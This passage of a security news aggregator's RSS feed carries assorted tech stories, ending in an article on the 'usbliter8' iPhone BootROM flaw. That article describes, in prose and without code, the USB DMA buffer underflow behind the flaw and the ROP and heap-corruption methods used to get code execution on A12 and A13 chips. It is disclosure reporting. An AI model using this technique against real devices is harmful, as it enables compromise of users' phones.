<p>Arguably, the internet itself is evidence of this, where groups like the <a href="https://www.ietf.org/">IETF</a> and the <a href="https://www.ieee.org/">IEEE</a> were instrumental in defining the fundamental protocols. “Without open protocols we would’ve been in telco hell and without phenomenons like Google or Facebook,” says Shaposhnik.</p>



<p>Or, take the <a href="https://www.infoworld.com/article/2335646/thirty-two-years-of-linux-and-its-community.html">history of Linux</a> as a parallel. “Linux became the default operating system because it offered a common, vendor-neutral foundation that everyone could build on,” says Collier. “In the AI era, open infrastructure will define the layers that organizations rely on for long-term continuity.”</p>



<p>At the infrastructure level, open standards have repeatedly underpinned major platform shifts, from <a href="https://www.infoworld.com/article/2253801/what-is-docker-the-spark-for-the-container-revolution.html">Docker</a> to <a href="https://www.infoworld.com/article/3812622/will-kubernetes-ever-get-easier.html">Kubernetes</a>. The question now is whether AI will develop a similarly durable standards layer.</p>



<p>For Parker, it’s too early to say, but the current growth of AI mirrors the early cloud. “Remember that it took many years before we saw the development and popularization of the open source cloud-native ecosystem,” he says. “I think it would be a mistake to extrapolate from the current trajectory towards a closed, proprietary future.”</p>



<p>Others agree the future must be rooted in openness. “I see open infrastructure becoming the foundation of enterprise AI,” says R Systems’s Abhyankar. “As systems become more distributed and agent‑driven, closed ecosystems simply won’t scale.”</p>



<p>The groundwork is being laid through open agentic protocols, open frameworks, and industry support intended to reduce fragmentation around proprietary standards.</p>



<p>“Ironically, the AI movement has mostly seemed to learn from the mistakes of the past and is starting off on a more open foot,” says Parker. “Over time, I believe we’ll see innovation and openness thrive.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[I forced Windows 11’s CPU boost on a 10-year-old PC, and it feels surprisingly new]]></title>
<description><![CDATA[Windows 11's Low Latency Profile CPU boost is now available for older PCs too. I tested it on a Lenovo ThinkCentre M700 with a 6th Gen Intel Core i3-6100, no Turbo Boost, and single-channel RAM. Here's what the CPU scheduler actually does on decade-old hardware, and whether it makes a difference....]]></description>
<link>https://tsecurity.de/de/3614387/windows-tipps/i-forced-windows-11s-cpu-boost-on-a-10-year-old-pc-and-it-feels-surprisingly-new/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3614387/windows-tipps/i-forced-windows-11s-cpu-boost-on-a-10-year-old-pc-and-it-feels-surprisingly-new/</guid>
<pubDate>Mon, 22 Jun 2026 04:24:37 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Windows 11's Low Latency Profile CPU boost is now available for older PCs too. I tested it on a Lenovo ThinkCentre M700 with a 6th Gen Intel Core i3-6100, no Turbo Boost, and single-channel RAM. Here's what the CPU scheduler actually does on decade-old hardware, and whether it makes a difference.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/22/i-forced-windows-11s-cpu-boost-on-a-10-year-old-pc-and-it-feels-surprisingly-new/">I forced Windows 11’s CPU boost on a 10-year-old PC, and it feels surprisingly new</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[After Six Years Of Work and Over 360 Patches, Linux 7.2 Finally Removes Bug-Prone strncpy]]></title>
<description><![CDATA[Tech Times reports:

Linux 7.2's merge window closed out a cleanup campaign on Friday that most kernel developers had stopped expecting to see end: the complete removal of strncpy(), a C string-copy function that the kernel's own documentation labels "actively dangerous," from every subsystem, dr...]]></description>
<link>https://tsecurity.de/de/3613972/it-security-nachrichten/after-six-years-of-work-and-over-360-patches-linux-72-finally-removes-bug-prone-strncpy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3613972/it-security-nachrichten/after-six-years-of-work-and-over-360-patches-linux-72-finally-removes-bug-prone-strncpy/</guid>
<pubDate>Sun, 21 Jun 2026 20:20:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Tech Times reports:

Linux 7.2's merge window closed out a cleanup campaign on Friday that most kernel developers had stopped expecting to see end: the complete removal of strncpy(), a C string-copy function that the kernel's own documentation labels "actively dangerous," from every subsystem, driver, and architecture-specific file in the kernel source tree. 

The merge landed June 20, 2026. After around 362 commits spread across six years of incremental work, no call site using the function remained, and the function itself — including the last per-CPU-architecture optimized implementations — was struck from the source. The removal matters beyond housekeeping. strncpy() is a persistent source of a specific class of memory error: kernel buffers that contain sensitive data can leak bytes past an unterminated string boundary, a pattern that enables memory disclosure vulnerabilities. Eliminating the function from the tree removes that entire class from the kernel's attack surface — and, critically, makes strncpy() unavailable to any future contributor, turning a best-practice suggestion into an enforced policy. 

Phoronix notes it's replaced by five different functions:


In place of strncpy, Linux kernel code should use strscpy() for NUL terminated destinations, strscpy_pad() for NUl-terminated destinations with zero-padding, strtomem_pad() for non-NUL-terminated fixed-width fields, memcpy_and_pad() for bounded copies with explicit padding, or memcpy() for known-length memory copies.
 

"The reason five functions were needed," explains Tech Times, "is that different parts of the kernel were using strncpy() for five semantically distinct memory operations — each with a different intent, different termination requirement, and different padding behavior. "



The original function obscured all of those differences under a single ambiguous name. The 362-commit campaign to replace it was, in effect, a codebase-wide audit that forced every call site to declare its actual intent in code That is an engineering outcome with lasting value: the kernel's string-handling semantics are now explicit where they were previously implicit, and future maintainers can read a function name and understand what a copy operation actually does.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=After+Six+Years+Of+Work+and+Over+360+Patches%2C+Linux+7.2+Finally+Removes+Bug-Prone+strncpy%3A+https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F06%2F21%2F1810200%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Flinux.slashdot.org%2Fstory%2F26%2F06%2F21%2F1810200%2Fafter-six-years-of-work-and-over-360-patches-linux-72-finally-removes-bug-prone-strncpy%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://linux.slashdot.org/story/26/06/21/1810200/after-six-years-of-work-and-over-360-patches-linux-72-finally-removes-bug-prone-strncpy?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI Announces Benchmarks for AI Life Sciences Research. Its Best Model Failed 63.9% of the Test]]></title>
<description><![CDATA[This week OpenAI announced a 750-task test to to measure "whether AI systems can support realistic life science research tasks, not just answer biology questions." 

But while OpenAI's top-performing GPT-Rosalind model led the rankings, Slashdot reader BrianFagioli notes that "it achieved a pass ...]]></description>
<link>https://tsecurity.de/de/3612797/it-security-nachrichten/openai-announces-benchmarks-for-ai-life-sciences-research-its-best-model-failed-639-of-the-test/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3612797/it-security-nachrichten/openai-announces-benchmarks-for-ai-life-sciences-research-its-best-model-failed-639-of-the-test/</guid>
<pubDate>Sat, 20 Jun 2026 23:52:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[This week OpenAI announced a 750-task test to to measure "whether AI systems can support realistic life science research tasks, not just answer biology questions." 

But while OpenAI's top-performing GPT-Rosalind model led the rankings, Slashdot reader BrianFagioli notes that "it achieved a pass rate of just 36.1 percent, failing nearly two-thirds of benchmark tasks." Nerds.xyz points out that means "the best-performing model failed nearly two-thirds of the benchmark's tasks."




The benchmark also revealed a familiar weakness. AI systems generally perform better when everything is presented as text. Once they are forced to work with supporting documents, figures, or complex datasets, performance drops noticeably. GPT-Rosalind's pass rate fell from 45.1 percent on text-only tasks to 28.1 percent on tasks involving artifacts or URLs. 

To be fair, the benchmark is not intended to suggest AI is useless in research. Quite the opposite. OpenAI found that models are becoming increasingly capable of scientific communication, evidence synthesis, and translating research findings into practical explanations. Those are valuable skills, particularly for researchers drowning in information. But LifeSciBench serves as a useful reminder that today's AI systems are still far from autonomous scientists. They can help. They can assist. They can sometimes provide surprisingly useful insights. What they cannot reliably do, however, is replace the expertise, judgment, and skepticism that real scientific research requires.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=OpenAI+Announces+Benchmarks+for+AI+Life+Sciences+Research.+Its+Best+Model+Failed+63.9%25+of+the+Test%3A+https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F20%2F202204%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Fscience.slashdot.org%2Fstory%2F26%2F06%2F20%2F202204%2Fopenai-announces-benchmarks-for-ai-life-sciences-research-its-best-model-failed-639-of-the-test%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://science.slashdot.org/story/26/06/20/202204/openai-announces-benchmarks-for-ai-life-sciences-research-its-best-model-failed-639-of-the-test?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Microsoft is killing the Microsoft account lock-in across products, Windows 11 may be next]]></title>
<description><![CDATA[Microsoft Edge is getting a Google account sign-in option, rolling out July 2026. You can already sign into Edge with your Gmail, and sync is on. Combined with plans to drop the forced Microsoft account requirement in Windows 11 setup, Microsoft is clearly easing its MSA grip after years of pushi...]]></description>
<link>https://tsecurity.de/de/3611558/windows-tipps/microsoft-is-killing-the-microsoft-account-lock-in-across-products-windows-11-may-be-next/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611558/windows-tipps/microsoft-is-killing-the-microsoft-account-lock-in-across-products-windows-11-may-be-next/</guid>
<pubDate>Sat, 20 Jun 2026 04:22:43 +0200</pubDate>
<category>🪟 Windows Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Microsoft Edge is getting a Google account sign-in option, rolling out July 2026. You can already sign into Edge with your Gmail, and sync is on. Combined with plans to drop the forced Microsoft account requirement in Windows 11 setup, Microsoft is clearly easing its MSA grip after years of pushing it on users.</p>
<p>The post <a rel="nofollow" href="https://www.windowslatest.com/2026/06/20/microsoft-is-killing-the-microsoft-account-lock-in-across-products-windows-11-may-be-next/">Microsoft is killing the Microsoft account lock-in across products, Windows 11 may be next</a> appeared first on <a rel="nofollow" href="https://www.windowslatest.com/">Windows Latest</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Friday Squid Blogging: Victims of Unregulated Squid Fishing]]></title>
<description><![CDATA[Dolphins, sharks, turtles, and human workers are all victims of unregulated squid fishing fleets.
Another news article.
As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.
Blog moderation policy.]]></description>
<link>https://tsecurity.de/de/3611309/it-security-nachrichten/friday-squid-blogging-victims-of-unregulated-squid-fishing/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3611309/it-security-nachrichten/friday-squid-blogging-victims-of-unregulated-squid-fishing/</guid>
<pubDate>Fri, 19 Jun 2026 23:08:16 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Dolphins, sharks, turtles, and human workers are all <a href="https://insideclimatenews.org/news/03062026/unregulated-squid-fleets-threaten-ocean-life-and-workers/">victims</a> of unregulated squid fishing fleets.</p>
<p>Another <a href="https://ejfoundation.org/news-media/global-squid-fleets-exposed-new-investigation-reveals-rampant-forced-labour-illegal-fishing-and-abuse">news article</a>.</p>
<p>As usual, you can also use this squid post to talk about the security stories in the news that I haven’t covered.</p>
<p><a href="https://www.schneier.com/blog/archives/2024/06/new-blog-moderation-policy.html">Blog moderation policy.</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cloud at 20: How AWS shaped enterprise IT]]></title>
<description><![CDATA[It is tempting to date cloud computing from the launch of Amazon S3 in 2006 and the rise of infrastructure as a service (IaaS) that followed. That was certainly the moment the market changed in a visible, irreversible way. But the truth is that cloud began earlier, in the 1990s, when software as ...]]></description>
<link>https://tsecurity.de/de/3610961/ai-nachrichten/cloud-at-20-how-aws-shaped-enterprise-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610961/ai-nachrichten/cloud-at-20-how-aws-shaped-enterprise-it/</guid>
<pubDate>Fri, 19 Jun 2026 18:49:14 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>It is tempting to <a href="https://aws.amazon.com/blogs/aws/twenty-years-of-amazon-s3-and-building-whats-next/">date cloud computing from the launch of Amazon S3 in 2006</a> and the rise of <a href="https://www.infoworld.com/article/2255598/what-is-iaas-your-data-center-in-the-cloud.html">infrastructure as a service (IaaS)</a> that followed. That was certainly the moment the market changed in a visible, irreversible way. But the truth is that cloud began earlier, in the 1990s, when <a href="https://www.infoworld.com/article/2256637/what-is-saas-software-as-a-service-defined.html">software as a service (SaaS)</a>, application hosting, managed services providers, and various forms of remote subscription computing started to reshape how enterprises thought about owning and operating technology. Even then, the core value proposition was familiar: Let someone else run the infrastructure, abstract the complexity, deliver capability as a service, and allow the business to consume only what it needs.</p>



<p>What AWS changed was the scale, accessibility, and precision of the execution. Amazon turned infrastructure into a programmable utility. It made compute and storage available in ways that were elastic, self-service, API-driven, and globally reachable. That was the breakthrough. Enterprises had outsourced pieces of technology before, but now they could rent raw infrastructure with unprecedented speed and flexibility. The launch of Amazon S3 was especially important because it provided a durable, scalable storage foundation that became one of the building blocks for modern digital business.</p>



<h2 class="wp-block-heading">AWS changed everything</h2>



<p>Technology markets are rarely transformed by the first company to think of an idea. They are transformed by the first company to make that idea operationally real, economically viable, and broadly consumable. AWS did exactly that. It built a model for infrastructure as a service that allowed enterprises, startups, and eventually governments to rethink the entire life cycle of IT delivery.</p>



<p>Looking back from 2026, it is difficult to remember how radical this concept once seemed. At the time, many enterprise leaders considered public cloud too risky, too immature, too uncontrolled, or simply too foreign for conventional IT governance. There were concerns about security, compliance, vendor dependency, performance, data residency, and reliability. Many of those concerns were valid. Early cloud adoption often ran ahead of cloud maturity, and many organizations discovered that moving quickly did not always mean moving wisely.</p>



<p>Still, the economics of agility overwhelmed the inertia of the old model. Provisioning that once took months could be done in minutes. Capital expenditure gave way, at least in part, to operating expenditure. Experimental workloads became easier to justify. Digital businesses could scale without building data centers first. AWS led that transition, and the rest of the industry followed, including competitors that helped mature the market.</p>



<h2 class="wp-block-heading">Cloud’s strengths and liabilities</h2>



<p>If the first decade of cloud was about acceleration, the second decade was about correction. Enterprises learned that cloud was not automatically cheaper, not automatically simpler, and not automatically better. It was better when used with discipline. It was more cost-effective when architected intelligently. It was more resilient when governance, operations, and security were designed into the system rather than added later.</p>



<p>This is when the industry grew up. We learned about <a href="https://www.infoworld.com/article/2338592/6-finops-best-practices-to-reduce-cloud-costs.html">cloud financial management</a> because too many organizations assumed elasticity would control cost, only to discover that unused resources, poor workload placement, and fragmented accountability could drive spending far beyond expectations. We learned that public cloud could provide extraordinary innovation and reach, but also that not every workload belongs there. Latency, sovereignty, compliance constraints, legacy integration challenges, and predictable high-volume workloads all forced a more nuanced view.</p>



<p>We also learned about concentration risk. As enterprises standardized on a small number of hyperscalers, questions emerged around resilience, lock-in, and strategic dependency. The answer was never simplistic <a href="https://www.infoworld.com/article/3584433/are-you-ready-for-multicloud-a-checklist.html">multicloud </a>posturing for its own sake. It was architectural realism. Use the public cloud where it creates a clear advantage. Keep options open where business risk requires it. Understand portability, but do not romanticize it. In other words, cloud became less ideological and more practical.</p>



<h2 class="wp-block-heading">Cloud is now an assumption</h2>



<p>Perhaps the most important shift of all is that we no longer debate whether cloud is real or whether enterprises should use it. That argument is over. Cloud is baked into the cake. It is part of enterprise operating reality. The modern enterprise assumes on-demand infrastructure, platform services, automation pipelines, managed databases, identity fabrics, observability stacks, and globally distributed application delivery. Even when workloads remain on-premises or at the edge, they are often built, governed, or operated with cloud-native thinking.</p>



<p>This is maturity. Cloud is not a project or a trend. It is not even a strategy by itself. It is an enabling model that now underpins enterprise strategy. Businesses no longer ask whether to adopt cloud in the abstract. They ask how much cloud, which cloud services, under what governance model, at what cost profile, and in support of which business outcomes.</p>



<p>That may sound less exciting than the early days of disruption, but it is actually the mark of success. The most powerful technologies eventually disappear into standard practice. Electricity, networking, virtualization, and mobile platforms all went through this process. Cloud has done the same.</p>



<h2 class="wp-block-heading">How cloud supports the AI race</h2>



<p>As enterprises move aggressively into <a href="https://www.infoworld.com/article/4061121/a-brief-history-of-ai.html">AI</a>, cloud has entered another pivotal phase. AI is not replacing cloud. It is intensifying the importance of cloud while also changing how value is measured. Training, tuning, deploying, and governing AI systems require immense computational scale, specialized infrastructure, distributed data access, and operational consistency. Public cloud providers are well positioned to offer those capabilities, particularly with GPUs, AI platforms, managed model services, and data integration tools.</p>



<p>But this is not a repeat of the early cloud era. Enterprises are more sober now. They know the importance of cost, latency, and data gravity. They know that governance and accountability matter more in AI than perhaps anywhere else in modern IT. The role of cloud in the AI race is therefore foundational, but not absolute. Some AI workloads will run in public cloud. Some will be distributed across <a href="https://www.networkworld.com/article/964305/what-is-edge-computing-and-how-it-s-changing-the-network.html" data-type="link" data-id="https://www.networkworld.com/article/964305/what-is-edge-computing-and-how-it-s-changing-the-network.html">edge computing</a> environments. Some will remain in private environments for reasons of sovereignty, economics, or control. The key is not to force a universal answer. The key is to create an architecture that aligns AI ambitions with operational reality.</p>



<p>Cloud should play the role it has gradually earned: not as a religion, but as a strategic utility. For AI, the cloud is where many enterprises will source scale, experimentation speed, global reach, and managed innovation. The winning organizations understand where cloud creates leverage and where other operating models make more sense.</p>



<h2 class="wp-block-heading">Changing how enterprises think</h2>



<p>The real story of the past 20 years is not just that AWS launched S3 and helped popularize infrastructure as a service. It is that cloud changed enterprise behavior. It normalized service consumption over asset ownership. It moved architecture toward abstraction, automation, and modularity. It forced IT organizations to broker capability rather than build everything from scratch. It redefined speed as a core competitive requirement.</p>



<p>And now, as AI becomes the next forcing function, cloud stands less as a novelty and more as the platform on which the next era will be built. That is a remarkable outcome for something that, in many ways, started with the old idea that computing could be delivered remotely on a subscription basis. We have been heading here for longer than many people realize. In the past two decades, led in large measure by AWS and the broader hyperscale movement it accelerated, cloud has evolved from a gamble to an indispensable foundation.</p>



<p>Hard to believe? Yes. But also inevitable in retrospect.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[The US banned Anthropic’s Fable 5 release, but the numbers don’t seem to care]]></title>
<description><![CDATA[Just as last week was ending, the US government forced Anthropic to pull its two newest models, Fable 5 and Mythos 5, citing national security concerns after Amazon researchers allegedly found a way to bypass Fable 5’s guardrails.  Cybersecurity researchers have since signed an open letter callin...]]></description>
<link>https://tsecurity.de/de/3610867/it-security-nachrichten/the-us-banned-anthropics-fable-5-release-but-the-numbers-dont-seem-to-care/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610867/it-security-nachrichten/the-us-banned-anthropics-fable-5-release-but-the-numbers-dont-seem-to-care/</guid>
<pubDate>Fri, 19 Jun 2026 18:10:59 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Just as last week was ending, the US government forced Anthropic to pull its two newest models, Fable 5 and Mythos 5, citing national security concerns after Amazon researchers allegedly found a way to bypass Fable 5’s guardrails.  Cybersecurity researchers have since signed an open letter calling the move dangerous, and Anthropic itself noted the same jailbreaks exist in other models. So is […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Is the US government’s Anthropic ban accidentally helping the brand?]]></title>
<description><![CDATA[Just as last week was ending, the US government forced Anthropic to pull its two newest models, Fable 5 and Mythos 5, citing national security concerns after Amazon researchers allegedly found a way to bypass Fable 5’s guardrails.  Cybersecurity researchers have since signed an open letter callin...]]></description>
<link>https://tsecurity.de/de/3610863/it-security-nachrichten/is-the-us-governments-anthropic-ban-accidentally-helping-the-brand/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610863/it-security-nachrichten/is-the-us-governments-anthropic-ban-accidentally-helping-the-brand/</guid>
<pubDate>Fri, 19 Jun 2026 18:10:54 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Just as last week was ending, the US government forced Anthropic to pull its two newest models, Fable 5 and Mythos 5, citing national security concerns after Amazon researchers allegedly found a way to bypass Fable 5’s guardrails.  Cybersecurity researchers have since signed an open letter calling the move dangerous, and Anthropic itself noted the same jailbreaks exist in other models. So is […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Most Companies Needed To Be Forced]]></title>
<description><![CDATA[Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:61 #PCI #ComplianceThe clip argues that standards like PCI helped push organizations toward foundational cybersecurity practices by tying security requirements directly to payment processing and business operations.

For many compan...]]></description>
<link>https://tsecurity.de/de/3610634/it-security-video/most-companies-needed-to-be-forced/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610634/it-security-video/most-companies-needed-to-be-forced/</guid>
<pubDate>Fri, 19 Jun 2026 16:19:03 +0200</pubDate>
<category>🎥 IT Security Video</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Security Weekly - A CRA Resource - Bewertung: 0x - Views:61 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/jXHEbLNVxYo?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>#PCI #ComplianceThe clip argues that standards like PCI helped push organizations toward foundational cybersecurity practices by tying security requirements directly to payment processing and business operations.<br />
<br />
For many companies, compliance became the forcing function that moved cybersecurity from optional to necessary.<br />
<br />
That creates a difficult reality for industries without similar pressure.<br />
<br />
If organizations are not required to meet security standards — or do not perceive immediate financial consequences — many may underinvest in cybersecurity despite growing threats.<br />
<br />
The challenge is no longer defining good security practices. It’s creating incentives strong enough for organizations to adopt them voluntarily.<br />
<br />
Should cybersecurity adoption depend on regulation and compliance pressure, or is there a better way to make organizations treat security as a core business responsibility?<br />
<br />
Subscribe to our podcasts: https://securityweekly.com/subscribe<br />
<br />
#PCI #Compliance #SecurityWeekly #Cybersecurity #InformationSecurity #AI #InfoSec<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New iPhone BootROM Flaw Enables Hardware-Level Compromise]]></title>
<description><![CDATA[Security researchers have disclosed a previously unknown iPhone BootROM vulnerability that allows attackers to compromise the boot chain on several Apple devices, including systems powered by A12 and A13 processors as well as Apple Watch S4 and S5 chipsets. The flaw, demonstrated through a proof-...]]></description>
<link>https://tsecurity.de/de/3609602/it-security-nachrichten/new-iphone-bootrom-flaw-enables-hardware-level-compromise/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3609602/it-security-nachrichten/new-iphone-bootrom-flaw-enables-hardware-level-compromise/</guid>
<pubDate>Fri, 19 Jun 2026 09:22:40 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1376" height="768" src="https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="iPhone BootROM vulnerability" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability.webp 1376w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-1024x572.webp 1024w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-768x429.webp 768w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-750x419.webp 750w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-1140x636.webp 1140w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability.webp 1376w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-1024x572.webp 1024w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-768x429.webp 768w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-750x419.webp 750w, https://thecyberexpress.com/wp-content/uploads/iPhone-BootROM-vulnerability-1140x636.webp 1140w" sizes="(max-width: 1376px) 100vw, 1376px" title="New iPhone BootROM Flaw Enables Hardware-Level Compromise 1"></p><span data-contrast="auto">Security researchers have disclosed a previously unknown iPhone BootROM vulnerability that allows attackers to compromise the boot chain on several Apple devices, including systems powered by A12 and A13 processors as well as Apple Watch S4 and S5 chipsets. The flaw, demonstrated through a proof-of-concept exploit dubbed "usbliter8," combines a hardware weakness in a USB controller with a firmware configuration issue that affects BootROM security.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">According to the researchers, the iPhone BootROM <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="28762">vulnerability</a> impacts Apple A12, A13, and Apple Watch S4/S5 platforms. While support for A12X and A12Z chips may be technically feasible, those devices were not included in the released implementation. The team said successful testing across the affected hardware was sufficient to validate both the vulnerability and the exploitation method.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Because the flaw resides in immutable SecureROM code, software updates cannot fully eliminate the <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risk" data-wpil-keyword-link="linked" data-wpil-monitor-id="28764">risk</a>. Researchers noted that upgrading to newer hardware remains the most effective mitigation.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">USB Controller Flaw Triggers iPhone BootROM vulnerability</span></b></h3>
<span data-contrast="auto">The vulnerability originates in the Synopsys DesignWare USB 2 (DWC2) controller used in affected <a href="https://thecyberexpress.com/iphone-ipad-cleared-for-nato-classified-data/" target="_blank" rel="noopener">Apple devices</a>. During USB communications, Setup transactions are transferred into memory using Direct Memory Access (DMA). Researchers discovered that the controller continuously updates the DMA address stored in the DOEPDMA register as <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28763">data</a> is received.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The issue emerges when the controller processes multiple Setup packets. While it can store three consecutive packets normally, a fourth packet causes the DMA pointer to reset. However, because the controller also accepts smaller packets while still processing data in four-byte chunks, a mismatch occurs between pointer increments and resets.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">This design flaw creates a buffer underflow condition that enables controlled memory corruption in 12-byte increments. Researchers believe the weakness exists within the USB controller architecture itself rather than Apple's software implementation.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">Testing showed that A12 and A13 SecureROM code is vulnerable, whereas A11 devices are not. The difference stems from the A11 USB driver, which manually restores the DMA address after each packet. Researchers also found that USB DART operates in bypass mode on A12 and A13 devices, enabling arbitrary SRAM overwrites. Newer A14 and later platforms appear to configure DART correctly, making practical exploitation significantly harder.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">SecureROM Code Execution Achieved Despite Protections</span></b><span data-ccp-props='{"134233117":false,"134233118":false,"134245418":true,"134245529":true,"335551550":0,"335551620":0,"335559738":299,"335559739":299}'> </span></h3>
<span data-contrast="auto"><a href="https://thecyberexpress.com/servicenow-flaw-exploited/" target="_blank" rel="noopener">Exploitation</a> methods differed between hardware generations. On A12 and Apple Watch S4/S5 devices, researchers achieved program counter control by overwriting a saved link register located near the USB DMA buffer. This allowed them to redirect execution and build a return-oriented programming (ROP) chain.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

<span data-contrast="auto">The A13 platform introduced Pointer Authentication Codes (PAC), making direct stack corruption ineffective. To overcome this protection, researchers developed a multi-stage attack involving heap corruption, interrupt handler manipulation, and controlled execution of function pointers stored in memory.</span><span data-ccp-props='{"134233117":false,"134233118":false,"335551550":0,"335551620":0,"335559738":240,"335559739":240}'> </span>

